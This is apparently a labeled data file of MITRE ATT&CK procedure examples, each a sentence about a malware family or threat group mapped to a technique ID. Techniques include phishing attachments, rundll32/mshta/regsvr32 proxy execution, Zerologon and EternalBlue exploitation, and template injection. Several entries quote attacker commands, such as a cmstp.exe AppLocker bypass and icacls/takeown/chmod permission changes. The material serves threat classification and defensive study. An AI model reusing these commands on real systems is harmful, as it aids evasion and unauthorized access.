{"text1":"Ferocious Kitten has attempted to convince victims to enable malicious content within a spearphishing email by including an odd decoy message.","labels":"['T1204.002']"}
{"text1":"Frankenstein has used trojanized Microsoft Word documents sent via email, which prompted the victim to enable macros.","labels":"['T1204.002']"}
{"text1":"Gallmaker sent victims a lure document with a warning that asked victims to \u201cenable content\u201d for execution.","labels":"['T1204.002']"}
{"text1":"Gamaredon Group has attempted to get users to click on Office attachments with malicious macros embedded.","labels":"['T1204.002']"}
{"text1":"Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.","labels":"['T1204.002']"}
{"text1":"Grandoreiro has infected victims via malicious attachments.","labels":"['T1204.002']"}
{"text1":"IcedID has been executed through Word documents with malicious embedded macros.","labels":"['T1204.002']"}
{"text1":"InvisiMole can deliver trojanized versions of software and documents, relying on user execution.","labels":"['T1204.002']"}
{"text1":"JCry has achieved execution by luring users to click on a file that appeared to be an Adobe Flash Player update installer.","labels":"['T1204.002']"}
{"text1":"Javali has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.","labels":"['T1204.002']"}
{"text1":"KONNI has relied on a victim to enable malicious macros within an attachment delivered via email.","labels":"['T1204.002']"}
{"text1":"Kerrdown has gained execution through victims opening malicious files.","labels":"['T1204.002']"}
{"text1":"Kimsuky has used attempted to lure victims into opening malicious e-mail attachments.","labels":"['T1204.002']"}
{"text1":"Leviathan has sent spearphishing attachments attempting to get a user to click.","labels":"['T1204.002']"}
{"text1":"Lokibot has tricked recipients into enabling malicious macros by getting victims to click \"enable content\" in email attachments.","labels":"['T1204.002']"}
{"text1":"Magic Hound has attempted to lure victims into opening malicious email attachments.","labels":"['T1204.002']"}
{"text1":"Magic Hound has lured victims into executing malicious files.","labels":"['T1204.002']"}
{"text1":"Metamorfo requires the user to double-click the executable to run the malicious HTA file or to download a malicious installer.","labels":"['T1204.002']"}
{"text1":"Mofang's malicious spearphishing attachments required a user to open the file after receiving.","labels":"['T1204.002']"}
{"text1":"Molerats has sent malicious files via email that tricked users into clicking Enable Content to run an embedded macro and to download malicious archives.","labels":"['T1204.002']"}
{"text1":"Mongall has relied on a user opening a malicious document for execution.","labels":"['T1204.002']"}
{"text1":"MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.","labels":"['T1204.002']"}
{"text1":"Mustang Panda has sent malicious files requiring direct victim interaction to execute.","labels":"['T1204.002']"}
{"text1":"NETWIRE has been executed through luring victims into opening malicious documents.","labels":"['T1204.002']"}
{"text1":"Naikon has convinced victims to open malicious attachments to execute malware.","labels":"['T1204.002']"}
{"text1":"NativeZone can display an RTF document to the user  to enable execution of  Cobalt Strike stage shellcode.","labels":"['T1204.002']"}
{"text1":"OSX\/Shlayer has relied on users mounting and executing a malicious DMG file.","labels":"['T1204.002']"}
{"text1":"OilRig has delivered macro-enabled documents that required targets to click the \"enable content\" button to execute the payload on the system.","labels":"['T1204.002']"}
{"text1":"OutSteel has relied on a user to execute a malicious attachment delivered via spearphishing.","labels":"['T1204.002']"}
{"text1":"PLATINUM has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims.","labels":"['T1204.002']"}
{"text1":"PROMETHIUM has attempted to get users to execute compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.","labels":"['T1204.002']"}
{"text1":"Patchwork embedded a malicious macro in a Word document and lured the victim to click on an icon to execute the malware.","labels":"['T1204.002']"}
{"text1":"PoetRAT has used spearphishing attachments to infect victims.","labels":"['T1204.002']"}
{"text1":"Pony has attempted to lure targets into downloading an attached executable (ZIP, RAR, or CAB archives) or document (PDF or other MS Office format).","labels":"['T1204.002']"}
{"text1":"QakBot has gained execution through users opening malicious attachments.","labels":"['T1204.002']"}
{"text1":"REvil has been executed via malicious MS Word e-mail attachments.","labels":"['T1204.002']"}
{"text1":"RTM has attempted to lure victims into opening e-mail attachments to execute malicious code.","labels":"['T1204.002']"}
{"text1":"RTM has relied on users opening malicious email attachments, decompressing the attached archive, and double-clicking the executable within.","labels":"['T1204.002']"}
{"text1":"Ramsay has been executed through malicious e-mail attachments.","labels":"['T1204.002']"}
{"text1":"Rifdoor has been executed from malicious Excel or Word documents containing macros.","labels":"['T1204.002']"}
{"text1":"SQLRat relies on users clicking on an embedded image to execute the scripts.","labels":"['T1204.002']"}
{"text1":"STARWHALE has relied on victims opening a malicious Excel file for execution.","labels":"['T1204.002']"}
{"text1":"Saint Bot has relied upon users to execute a malicious attachment delivered via spearphishing.","labels":"['T1204.002']"}
{"text1":"Sandworm Team has tricked unwitting recipients into clicking on spearphishing attachments and enabling malicious macros embedded within files.","labels":"['T1204.002']"}
{"text1":"Silence attempts to get users to launch malicious attachments delivered via spearphishing emails.","labels":"['T1204.002']"}
{"text1":"Some SUGARDUMP variants required a user to enable a macro within a malicious .xls file for execution.","labels":"['T1204.002']"}
{"text1":"TA459 has attempted to get victims to open malicious Microsoft Word attachment sent via spearphishing.","labels":"['T1204.002']"}
{"text1":"TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and\/or .lnk files.","labels":"['T1204.002']"}
{"text1":"TA551 has prompted users to enable macros within spearphishing attachments to install malware.","labels":"['T1204.002']"}
{"text1":"The White Company has used phishing lure documents that trick users into opening them and infecting their computers.","labels":"['T1204.002']"}
{"text1":"Threat Group-3390 has lured victims into opening malicious files containing malware.","labels":"['T1204.002']"}
{"text1":"ThreatNeedle relies on a victim to click on a malicious document for initial execution.","labels":"['T1204.002']"}
{"text1":"Tonto Team has relied on user interaction to open their malicious RTF documents.","labels":"['T1204.002']"}
{"text1":"Tropic Trooper has lured victims into executing malware via malicious e-mail attachments.","labels":"['T1204.002']"}
{"text1":"WIRTE has attempted to lure users into opening malicious MS Word and Excel files to execute malicious payloads.","labels":"['T1204.002']"}
{"text1":"WarzoneRAT has relied on a victim to open a malicious attachment within an email for execution.","labels":"['T1204.002']"}
{"text1":"Windshift has used e-mail attachments to lure victims into executing malicious code.","labels":"['T1204.002']"}
{"text1":"Wizard Spider has lured victims to execute malware with spearphishing attachments containing macros to download either Emotet, Bokbot, TrickBot, or Bazar.","labels":"['T1204.002']"}
{"text1":"ZxxZ has relied on victims to open a malicious attachment delivered via email.","labels":"['T1204.002']"}
{"text1":"admin@338 has attempted to get victims to launch malicious Microsoft Word attachments delivered via spearphishing emails.","labels":"['T1204.002']"}
{"text1":"menuPass has attempted to get victims to open malicious files such as Windows Shortcuts (.lnk) and\/or Microsoft Office documents, sent via email as part of spearphishing campaigns.","labels":"['T1204.002']"}
{"text1":"TeamTNT has relied on users to download and execute malicious Docker images.","labels":"['T1204.003']"}
{"text1":"Kobalos is triggered by an incoming TCP connection to a legitimate service from a specific source port.","labels":"['T1205']"}
{"text1":"Pandora can identify if incoming HTTP traffic contains a token and if so it will intercept the traffic and process the received command.","labels":"['T1205']"}
{"text1":"Ryuk has used Wake-on-Lan to power on turned off systems for lateral movement.","labels":"['T1205']"}
{"text1":"SYNful Knock can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages.","labels":"['T1205']"}
{"text1":"Umbreon provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet","labels":"['T1205']"}
{"text1":"Winnti for Linux has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism.","labels":"['T1205']"}
{"text1":"PROMETHIUM has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports.","labels":"['T1205.001']"}
{"text1":"Penquin installs a `TCP` and `UDP` filter on the `eth0` interface.","labels":"['T1205.002']"}
{"text1":"APT28 exploited a Windows SMB Remote Code Execution Vulnerability to conduct lateral movement.","labels":"['T1210']"}
{"text1":"Conficker exploited the MS08-067 Windows vulnerability for remote code execution through a crafted RPC request.","labels":"['T1210']"}
{"text1":"Dragonfly has exploited a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory servers.","labels":"['T1210']"}
{"text1":"Earth Lusca has used Mimikatz to exploit a domain controller via the ZeroLogon exploit (CVE-2020-1472).","labels":"['T1210']"}
{"text1":"Emotet has been seen exploiting SMB via a vulnerability exploit like EternalBlue (MS17-010) to achieve lateral movement and propagation.","labels":"['T1210']"}
{"text1":"Empire has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers.","labels":"['T1210']"}
{"text1":"Fox Kitten has exploited known vulnerabilities in remote services including RDP.","labels":"['T1210']"}
{"text1":"InvisiMole can spread within a network via the BlueKeep (CVE-2019-0708) and EternalBlue (CVE-2017-0144) vulnerabilities in RDP and SMB respectively.","labels":"['T1210']"}
{"text1":"Lucifer can exploit multiple vulnerabilities including EternalBlue (CVE-2017-0144) and EternalRomance (CVE-2017-0144).","labels":"['T1210']"}
{"text1":"MuddyWater has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472).","labels":"['T1210']"}
{"text1":"NotPetya can use two exploits in SMBv1, EternalBlue and EternalRomance, to spread itself to other remote systems on the network.","labels":"['T1210']"}
{"text1":"PoshC2 contains a module for exploiting SMB via EternalBlue.","labels":"['T1210']"}
{"text1":"QakBot can move laterally using worm-like functionality through exploitation of SMB.","labels":"['T1210']"}
{"text1":"Stuxnet propagates using the MS10-061 Print Spooler and MS08-067 Windows Server Service vulnerabilities.","labels":"['T1210']"}
{"text1":"Wizard Spider has exploited or attempted to exploit Zerologon (CVE-2020-1472) and EternalBlue (MS17-010) vulnerabilities.","labels":"['T1210']"}
{"text1":"APT28 has collected files from various information repositories.","labels":"['T1213']"}
{"text1":"APT29 has accessed victims\u2019 internal knowledge repositories (wikis) to view sensitive corporate information on products, services, and internal business operations.","labels":"['T1213']"}
{"text1":"FIN6 has collected schemas and user accounts from systems running SQL Server.","labels":"['T1213']"}
{"text1":"Fox Kitten has accessed victim security and IT environments and Microsoft Teams to mine valuable information.","labels":"['T1213']"}
{"text1":"LAPSUS$ has searched a victim's network for organization collaboration channels like MS Teams or Slack to discover further high-privilege account credentials.","labels":"['T1213']"}
{"text1":"P.A.S. Webshell has the ability to list and extract data from SQL databases.","labels":"['T1213']"}
{"text1":"LAPSUS$ has searched a victim's network for collaboration platforms like Confluence and JIRA to discover further high-privilege account credentials.","labels":"['T1213.001']"}
{"text1":"APT28 has collected information from Microsoft SharePoint services within target networks.","labels":"['T1213.002']"}
{"text1":"Ke3chang used a SharePoint enumeration and data dumping tool known as spwebmember.","labels":"['T1213.002']"}
{"text1":"LAPSUS$ has searched a victim's network for collaboration platforms like SharePoint to discover further high-privilege account credentials.","labels":"['T1213.002']"}
{"text1":"spwebmember is used to enumerate and dump information from Microsoft SharePoint.","labels":"['T1213.002']"}
{"text1":"APT29 has downloaded source code from code repositories.","labels":"['T1213.003']"}
{"text1":"APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.","labels":"['T1216.001']"}
{"text1":"APT38 has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources.","labels":"['T1217']"}
{"text1":"Calisto collects information on bookmarks from Google Chrome.","labels":"['T1217']"}
{"text1":"Dtrack can retrieve browser history.","labels":"['T1217']"}
{"text1":"Empire has the ability to gather browser data such as bookmarks and visited sites.","labels":"['T1217']"}
{"text1":"Fox Kitten has used Google Chrome bookmarks to identify internal resources and assets.","labels":"['T1217']"}
{"text1":"MobileOrder has a command to upload to its C2 server victim browser bookmarks.","labels":"['T1217']"}
{"text1":"PowerLess can use a .NET browser information stealer module.","labels":"['T1217']"}
{"text1":"APT38 has used CHM files to move concealed payloads.","labels":"['T1218.001']"}
{"text1":"APT41 used compiled HTML (.chm) files for targeting.","labels":"['T1218.001']"}
{"text1":"Astaroth uses ActiveX objects for file execution and manipulation.","labels":"['T1218.001']"}
{"text1":"OilRig has used a CHM payload to load and execute another malicious file once delivered to a victim.","labels":"['T1218.001']"}
{"text1":"Silence has weaponized CHM files in their phishing campaigns.","labels":"['T1218.001']"}
{"text1":"InvisiMole can register itself for execution and persistence via the Control Panel.","labels":"['T1218.002']"}
{"text1":"Cobalt Group has used the command \"cmstp.exe \/s \/ns C:\\Users\\ADMINI~W\\AppData\\Local\\Temp\\XKNqbpzl.txt\" to bypass AppLocker and launch a malicious script.","labels":"['T1218.003']"}
{"text1":"MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload.","labels":"['T1218.003']"}
{"text1":"Chaes has used Installutill to download content.","labels":"['T1218.004']"}
{"text1":"Saint Bot had used `InstallUtil.exe` to download and deploy executables.","labels":"['T1218.004']"}
{"text1":"WhisperGate has used `InstallUtil.exe` as part of its process to disable Windows Defender.","labels":"['T1218.004']"}
{"text1":"menuPass has used \"InstallUtil.exe\" to execute malicious software.","labels":"['T1218.004']"}
{"text1":"APT29 has use `mshta` to execute malicious scripts on a compromised host.","labels":"['T1218.005']"}
{"text1":"APT32 has used mshta.exe for code execution.","labels":"['T1218.005']"}
{"text1":"BabyShark has used mshta.exe to download and execute applications from a remote server.","labels":"['T1218.005']"}
{"text1":"Confucius has used mshta.exe to execute malicious VBScript.","labels":"['T1218.005']"}
{"text1":"During C0015, the threat actors used `mshta` to execute DLLs.","labels":"['T1218.005']"}
{"text1":"During Operation Dust Storm, the threat actors executed JavaScript code via `mshta.exe`.","labels":"['T1218.005']"}
{"text1":"Earth Lusca has used `mshta.exe` to load an HTA script within a malicious .LNK file.","labels":"['T1218.005']"}
{"text1":"FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.","labels":"['T1218.005']"}
{"text1":"Gamaredon Group has used `mshta.exe` to execute malicious HTA files.","labels":"['T1218.005']"}
{"text1":"Inception has used malicious HTA files to drop and execute malware.","labels":"['T1218.005']"}
{"text1":"Kimsuky has used mshta.exe to run malicious scripts on the system.","labels":"['T1218.005']"}
{"text1":"Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.","labels":"['T1218.005']"}
{"text1":"Lazarus Group has used \"mshta.exe\" to execute HTML pages downloaded by initial access documents.","labels":"['T1218.005']"}
{"text1":"Lazarus Group has used mshta.exe to run malicious scripts and download programs.","labels":"['T1218.005']"}
{"text1":"LazyScripter has used `mshta.exe` to execute Koadic stagers.","labels":"['T1218.005']"}
{"text1":"MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.","labels":"['T1218.005']"}
{"text1":"NanHaiShu uses mshta.exe to load its program and files.","labels":"['T1218.005']"}
{"text1":"Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server.","labels":"['T1218.005']"}
{"text1":"Revenge RAT uses mshta.exe to run malicious scripts on the system.","labels":"['T1218.005']"}
{"text1":"Sibot has been executed via MSHTA application.","labels":"['T1218.005']"}
{"text1":"Sidewinder has used \"mshta.exe\" to execute malicious payloads.","labels":"['T1218.005']"}
{"text1":"TA551 has used mshta.exe to execute malicious payloads.","labels":"['T1218.005']"}
{"text1":"Xbash can use mshta for executing scripts.","labels":"['T1218.005']"}
{"text1":"AppleJeus has been installed via MSI installer.","labels":"['T1218.007']"}
{"text1":"Chaes has used .MSI files as an initial way to start the infection chain.","labels":"['T1218.007']"}
{"text1":"Clop can use msiexec.exe to disable security tools on the system.","labels":"['T1218.007']"}
{"text1":"Duqu has used \"msiexec\" to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages.","labels":"['T1218.007']"}
{"text1":"FlawedAmmyy has been installed via `msiexec.exe`.","labels":"['T1218.007']"}
{"text1":"Grandoreiro can use MSI files to execute DLLs.","labels":"['T1218.007']"}
{"text1":"IcedID can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application.","labels":"['T1218.007']"}
{"text1":"Javali has used the MSI installer to download and execute malicious payloads.","labels":"['T1218.007']"}
{"text1":"LoudMiner used an MSI installer to install the virtualization software.","labels":"['T1218.007']"}
{"text1":"Machete has used msiexec to install the Machete malware.","labels":"['T1218.007']"}
{"text1":"Maze has delivered components for its ransomware attacks using MSI files, some of which have been executed from the command-line using \"msiexec\".","labels":"['T1218.007']"}
{"text1":"Melcoz can use MSI files with embedded VBScript for execution.","labels":"['T1218.007']"}
{"text1":"Metamorfo has used MsiExec.exe to automatically execute files.","labels":"['T1218.007']"}
{"text1":"RCSession has the ability to execute inside the msiexec.exe process.","labels":"['T1218.007']"}
{"text1":"Ragnar Locker has been delivered as an unsigned MSI package that was executed with \"msiexec.exe\".","labels":"['T1218.007']"}
{"text1":"Rancor has used \"msiexec\" to download and execute malicious installer files over HTTP.","labels":"['T1218.007']"}
{"text1":"TA505 has used \"msiexec\" to download and execute malicious Windows Installer files.","labels":"['T1218.007']"}
{"text1":"Bumblebee can use `odbcconf.exe` to run DLLs on targeted hosts.","labels":"['T1218.008']"}
{"text1":"Agent Tesla has dropped RegAsm.exe onto systems for performing malicious activity.","labels":"['T1218.009']"}
{"text1":"APT19 used Regsvr32 to bypass application control techniques.","labels":"['T1218.010']"}
{"text1":"APT32 created a Scheduled Task\/Job that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. The group has also used regsvr32 to run their backdoor.","labels":"['T1218.010']"}
{"text1":"AppleSeed can call regsvr32.exe for execution.","labels":"['T1218.010']"}
{"text1":"Astaroth can be loaded through regsvr32.exe.","labels":"['T1218.010']"}
{"text1":"Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using regsvr32.exe.","labels":"['T1218.010']"}
{"text1":"Cobalt Group has used regsvr32.exe to execute scripts.","labels":"['T1218.010']"}
{"text1":"Derusbi variants have been seen that use Registry persistence to proxy execution through regsvr32.exe.","labels":"['T1218.010']"}
{"text1":"During C0015, the threat actors employed code that used `regsvr32` for execution.","labels":"['T1218.010']"}
{"text1":"EVILNUM can run a remote scriptlet that drops a file and executes it via regsvr32.exe.","labels":"['T1218.010']"}
{"text1":"Egregor has used regsvr32.exe to execute malicious DLLs.","labels":"['T1218.010']"}
{"text1":"HermeticWizard has used `regsvr32.exe \/s \/i` to execute malicious payloads.","labels":"['T1218.010']"}
{"text1":"Kimsuky has executed malware with \"regsvr32s\".","labels":"['T1218.010']"}
{"text1":"Koadic can use Regsvr32 to execute additional payloads.","labels":"['T1218.010']"}
{"text1":"Lazarus Group has used rgsvr32 to execute custom malware.","labels":"['T1218.010']"}
{"text1":"QakBot can use Regsvr32 to execute malicious DLLs.","labels":"['T1218.010']"}
{"text1":"Ragnar Locker has used regsvr32.exe to execute components of VirtualBox.","labels":"['T1218.010']"}
{"text1":"RogueRobin uses regsvr32.exe to run a .sct file for execution.","labels":"['T1218.010']"}
{"text1":"Saint Bot has used `regsvr32` to execute scripts.","labels":"['T1218.010']"}
{"text1":"Some Orz versions have an embedded DLL known as MockDll that uses Process Hollowing and regsvr32 to execute another payload.","labels":"['T1218.010']"}
{"text1":"Valak has used \"regsvr32.exe\" to launch malicious DLLs.","labels":"['T1218.010']"}
{"text1":"WIRTE has used `regsvr32.exe` to trigger the execution of a malicious script.","labels":"['T1218.010']"}
{"text1":"Xbash can use regsvr32 for executing scripts.","labels":"['T1218.010']"}
{"text1":"A gh0st RAT variant has used rundll32 for execution.","labels":"['T1218.011']"}
{"text1":"APT19 configured its payload to inject into the rundll32.exe.","labels":"['T1218.011']"}
{"text1":"APT28 executed CHOPSTICK by using rundll32 commands such as \"rundll32.exe \u201cC:\\Windows\\twain_64.dll\u201d\". APT28 also executed a .dll for a first stage dropper using rundll32.exe. An APT28 loader Trojan saved a batch script that uses rundll32 to execute a DLL payload.","labels":"['T1218.011']"}
{"text1":"APT3 has a tool that can run DLLs.","labels":"['T1218.011']"}
{"text1":"APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.","labels":"['T1218.011']"}
{"text1":"APT41 has used rundll32.exe to execute a loader.","labels":"['T1218.011']"}
{"text1":"After copying itself to a DLL file, a variant of Elise calls the DLL file using rundll32.exe.","labels":"['T1218.011']"}
{"text1":"Attor's installer plugin can schedule rundll32.exe to load the dispatcher.","labels":"['T1218.011']"}
{"text1":"BLINDINGCAN has used Rundll32 to load a malicious DLL.","labels":"['T1218.011']"}
{"text1":"Backdoor.Oldrea can use rundll32 for execution on compromised hosts.","labels":"['T1218.011']"}
{"text1":"BoomBox can use RunDLL32 for execution.","labels":"['T1218.011']"}
{"text1":"Briba uses rundll32 within Registry Run Keys \/ Startup Folder entries to execute malicious DLLs.","labels":"['T1218.011']"}
{"text1":"CORESHELL is installed via execution of rundll32 with an export named \"init\" or \"InitW.\"","labels":"['T1218.011']"}
{"text1":"Carbanak installs VNC server software that executes through rundll32.","labels":"['T1218.011']"}
{"text1":"Cobalt Strike can use `rundll32.exe` to load DLL from the command line.","labels":"['T1218.011']"}
{"text1":"Comnie uses Rundll32 to load a malicious DLL.","labels":"['T1218.011']"}
{"text1":"CopyKittens uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.","labels":"['T1218.011']"}
{"text1":"DDKONG uses Rundll32 to ensure only a single instance of itself is running at once.","labels":"['T1218.011']"}
{"text1":"During Operation Spalax, the threat actors used `rundll32.exe` to execute malicious installers.","labels":"['T1218.011']"}
{"text1":"EVILNUM can execute commands and scripts through rundll32.","labels":"['T1218.011']"}
{"text1":"Egregor has used rundll32 during execution.","labels":"['T1218.011']"}
{"text1":"FatDuke can execute via rundll32.","labels":"['T1218.011']"}
{"text1":"FlawedAmmyy has used `rundll32` for execution.","labels":"['T1218.011']"}
{"text1":"FunnyDream can use `rundll32` for execution of its components.","labels":"['T1218.011']"}
{"text1":"GreyEnergy uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\\SYSTEM).","labels":"['T1218.011']"}
{"text1":"HAFNIUM has used \"rundll32\" to load malicious DLLs.","labels":"['T1218.011']"}
{"text1":"HermeticWizard has the ability to create a new process using `rundll32`.","labels":"['T1218.011']"}
{"text1":"InvisiMole has used rundll32.exe for execution.","labels":"['T1218.011']"}
{"text1":"KONNI has used Rundll32 to execute its loader for privilege escalation purposes.","labels":"['T1218.011']"}
{"text1":"Koadic can use Rundll32 to execute additional payloads.","labels":"['T1218.011']"}
{"text1":"Kwampirs uses rundll32.exe in a Registry value added to establish persistence.","labels":"['T1218.011']"}
{"text1":"Lazarus Group has used rundll32 to execute malicious payloads on a compromised host.","labels":"['T1218.011']"}
{"text1":"MegaCortex has used \"rundll32.exe\" to load a DLL for file encryption.","labels":"['T1218.011']"}
{"text1":"Mongall can use `rundll32.exe` for execution.","labels":"['T1218.011']"}
{"text1":"Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.","labels":"['T1218.011']"}
{"text1":"MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.","labels":"['T1218.011']"}
{"text1":"NOKKI has used rundll32 for execution.","labels":"['T1218.011']"}
{"text1":"PUNCHBUGGY can load a DLL using Rundll32.","labels":"['T1218.011']"}
{"text1":"PcShare has used `rundll32.exe` for execution.","labels":"['T1218.011']"}
{"text1":"PolyglotDuke can be executed using rundll32.exe.","labels":"['T1218.011']"}
{"text1":"PowerDuke uses rundll32.exe to load.","labels":"['T1218.011']"}
{"text1":"Pteranodon executes functions using rundll32.exe.","labels":"['T1218.011']"}
{"text1":"QakBot can use Rundll32.exe to enable C2 communication.","labels":"['T1218.011']"}
{"text1":"RTM runs its core DLL file using rundll32.exe.","labels":"['T1218.011']"}
{"text1":"Ragnar Locker has used rundll32.exe to execute components of VirtualBox.","labels":"['T1218.011']"}
{"text1":"Rundll32.exe is used as a way of executing Flame at the command-line.","labels":"['T1218.011']"}
{"text1":"Sakula calls cmd.exe to run various DLL files via rundll32.","labels":"['T1218.011']"}
{"text1":"Sandworm Team used a backdoor which could execute a supplied DLL using rundll32.exe.","labels":"['T1218.011']"}
{"text1":"ServHelper contains a module for downloading and executing DLLs that leverages \"rundll32.exe\".","labels":"['T1218.011']"}
{"text1":"Sibot has executed downloaded DLLs with \"rundll32.exe\".","labels":"['T1218.011']"}
{"text1":"Squirrelwaffle has been executed using `rundll32.exe`.","labels":"['T1218.011']"}
{"text1":"StreamEx uses rundll32 to call an exported function.","labels":"['T1218.011']"}
{"text1":"TA505 has leveraged \"rundll32.exe\" to execute malicious DLLs.","labels":"['T1218.011']"}
{"text1":"TA551 has used rundll32.exe to load malicious DLLs.","labels":"['T1218.011']"}
{"text1":"The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component.","labels":"['T1218.011']"}
{"text1":"USBferry can execute rundll32.exe in memory to avoid detection.","labels":"['T1218.011']"}
{"text1":"Variants of Emissary have used rundll32.exe in Registry values added to establish persistence.","labels":"['T1218.011']"}
{"text1":"ZxShell has used rundll32.exe to execute other DLLs and named pipes.","labels":"['T1218.011']"}
{"text1":"Carbanak used legitimate programs such as AmmyyAdmin and Team Viewer for remote interactive C2 to target systems.","labels":"['T1219']"}
{"text1":"Dridex contains a module for VNC.","labels":"['T1219']"}
{"text1":"During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network.","labels":"['T1219']"}
{"text1":"During Night Dragon, threat actors used several remote administration tools as persistent infiltration channels.","labels":"['T1219']"}
{"text1":"Egregor has checked for the LogMein event log in an attempt to encrypt files in remote machines.","labels":"['T1219']"}
{"text1":"Hildegard has established tmate sessions for C2 communications.","labels":"['T1219']"}
{"text1":"MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.","labels":"['T1219']"}
{"text1":"Mustang Panda has installed TeamViewer on targeted systems.","labels":"['T1219']"}
{"text1":"Night Dragon has used several remote administration tools as persistent infiltration channels.","labels":"['T1219']"}
{"text1":"RTM has the capability to download a VNC module from command and control (C2).","labels":"['T1219']"}
{"text1":"Sandworm Team has used remote administration tools or remote industrial control system client software to maliciously release electricity breakers.","labels":"['T1219']"}
{"text1":"TeamTNT has established tmate sessions for C2 communications.","labels":"['T1219']"}
{"text1":"Thrip used a cloud-based remote access software called LogMeIn for their attacks.","labels":"['T1219']"}
{"text1":"Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain.","labels":"['T1220']"}
{"text1":"Higaisa used an XSL file to run VBScript code.","labels":"['T1220']"}
{"text1":"Lazarus Group has used WMIC to execute a remote XSL script to establish persistence.","labels":"['T1220']"}
{"text1":"APT28 used weaponized Microsoft Word documents abusing the remote template function to retrieve a malicious macro.","labels":"['T1221']"}
{"text1":"Chaes changed the template target of the settings.xml file embedded in the Word document and populated that field with the downloaded URL of the next payload.","labels":"['T1221']"}
{"text1":"DarkHydrus used an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable Forced Authentication.","labels":"['T1221']"}
{"text1":"Dragonfly 2.0 has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication.","labels":"['T1221']"}
{"text1":"Dragonfly has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication.","labels":"['T1221']"}
{"text1":"During Frankenstein, the threat actors used trojanized documents that retrieved remote templates from an adversary-controlled website.","labels":"['T1221']"}
{"text1":"Frankenstein has used trojanized documents that retrieve remote templates from an adversary-controlled website.","labels":"['T1221']"}
{"text1":"Gamaredon Group has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads. Gamaredon Group can also inject malicious macros or remote templates into documents already present on compromised systems.","labels":"['T1221']"}
{"text1":"Tropic Trooper delivered malicious documents with the XLSX extension, typically used by OpenXML documents, but the file itself was actually an OLE (XLS) document.","labels":"['T1221']"}
{"text1":"WarzoneRAT has been install via template injection through a malicious DLL embedded within a template RTF in a Word document.","labels":"['T1221']"}
{"text1":"BitPaymer can use \"icacls \/reset\" and \"takeown \/F\" to reset a targeted executable's permissions and then take ownership.","labels":"['T1222.001']"}
{"text1":"Grandoreiro can modify the binary ACL to prevent security tools from running.","labels":"['T1222.001']"}
{"text1":"WannaCry uses \"attrib +h\" and \"icacls . \/grant Everyone:F \/T \/C \/Q\" to make some of its files hidden and grant all users full access controls.","labels":"['T1222.001']"}
{"text1":"WastedLocker has a command to take ownership of a file and reset the ACL permissions using the \"takeown.exe \/F filepath\" command.","labels":"['T1222.001']"}
{"text1":"Wizard Spider has used the icacls command to modify access control to backup servers, providing them with full control of all the system folders.","labels":"['T1222.001']"}
{"text1":"Bundlore changes the permissions of a payload using the command \"chmod -R 755\".","labels":"['T1222.002']"}
{"text1":"Dok gives all users execute permissions for the application using the command \"chmod +x \/Users\/Shared\/AppStore.app\".","labels":"['T1222.002']"}
{"text1":"Kinsing has used chmod to modify permissions on key files for use.","labels":"['T1222.002']"}
{"text1":"OSX\/Shlayer can use the \"chmod\" utility to set a file as executable, such as \"chmod 777\" or \"chmod +x\".","labels":"['T1222.002']"}
{"text1":"OSX_OCEANLOTUS.D has changed permissions of a second-stage payload to an executable via \"chmod\".","labels":"['T1222.002']"}
{"text1":"P.A.S. Webshell has the ability to modify file permissions.","labels":"['T1222.002']"}
{"text1":"Penquin can add the executable flag to a downloaded file.","labels":"['T1222.002']"}
{"text1":"Rocke has changed file permissions of files so they could not be modified.","labels":"['T1222.002']"}
{"text1":"TeamTNT has modified the permissions on binaries with \"chattr\".","labels":"['T1222.002']"}
{"text1":"Anchor can terminate itself if specific execution flags are not present.","labels":"['T1480']"}
{"text1":"BitPaymer compares file names and paths to a list of excluded names and directory names during encryption.","labels":"['T1480']"}
{"text1":"EnvyScout can call \"window.location.pathname\" to ensure that embedded files are being executed from the C: drive, and will terminate if they are not.","labels":"['T1480']"}
{"text1":"SUNSPOT only replaces SolarWinds Orion source code if the MD5 checksums of both the original source code file and backdoored replacement source code match hardcoded values.","labels":"['T1480']"}
